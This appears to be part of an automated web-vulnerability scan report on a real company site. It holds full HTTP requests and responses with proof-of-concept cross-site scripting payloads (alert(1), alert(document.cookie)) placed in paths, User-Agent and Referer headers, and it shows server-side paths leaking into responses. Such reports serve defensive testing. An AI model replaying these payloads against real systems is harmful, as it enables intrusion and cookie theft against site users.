Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:46 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616680
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-sco.gif";REFERER="http://www.google.com/search?hl=en&q=e577b</script><script>alert(1)</script>8b6c42b829c";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.25. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript rest-of-line comment. The payload 448df</script><script>alert(1)</script>5c33d38c29d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16448df</script><script>alert(1)</script>5c33d38c29d
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:43 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616677
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6582

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
rt(document.cookie)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16448df</script><script>alert(1)</script>5c33d38c29d";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/6d0LP02Jl5e3BIJdPZgebPqi4TSzMowv.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

2. Referer-dependent response previous next
There are 8 instances of this issue:

/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif
/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif
/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif
/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif
/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif
/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif
/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif
/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-sco.gif

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

2.1. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif

Request 1

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:12 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616706
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6519

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-fp.gif";REFERER="http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/xW59a9efPvD84Y0bvgU8uIg6V6zFSZo3.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

Request 2

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:16 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616710
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-fp.gif";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/1mdHLieXpCv5SNBNzd3anA9QT6UNARXQ.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

2.2. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif

Request 1

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:12 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616706
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6519

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-mm.gif";REFERER="http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/5i9RU95Svsc13p1dQ5E0Gu8aHacY9AH4.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

Request 2

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:14 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616708
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-mm.gif";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/hOr4178vw0SXY5732xsIQa10P5STfzX6.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

2.3. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif

Request 1

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:13 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616707
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-oki.gif";REFERER="http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/q8jUG4DI28FqWi9Jv2CBP3Qo61nucp7N.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

Request 2

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:15 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616709
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-oki.gif";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/Jx5SwoN5rzcZTU9V2wzS84W81jVXFDDk.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

2.4. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif

Request 1

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:12 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616706
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-sco.gif";REFERER="http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/2367Cn3whwq7wvjoKK7wH17H6PTFP7lW.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

Request 2

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:15 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616709
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-sco.gif";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/St0eT7D245pos2X8D866D7z0273h8V6O.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

2.5. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif

Request 1

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:29 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616663
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-fp.gif";REFERER="http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/rztS1fjvPc4NqTkNw31EKJyWKxEk1pLo.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

Request 2

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:33 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616667
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6433

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-fp.gif";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/Rvm16jqo9Ft67S72vV6a6Wa30W0Nlm89.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

2.6. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif

Request 1

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:29 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616663
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-mm.gif";REFERER="http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/W1as4Kn8rwzRW0ty41s6a0a4fyoI87Nx.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

Request 2

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:31 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616665
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6433

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-mm.gif";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/2FvEh645gYvIX4O7ODKHg1U6y9WVwbJM.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_hit.f -v web.select_first_record.s -y web.auto -a -u>/dev/null -->
</body>
</html>

2.7. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif

Request 1

GET /index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:41:29 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616663
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6532

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
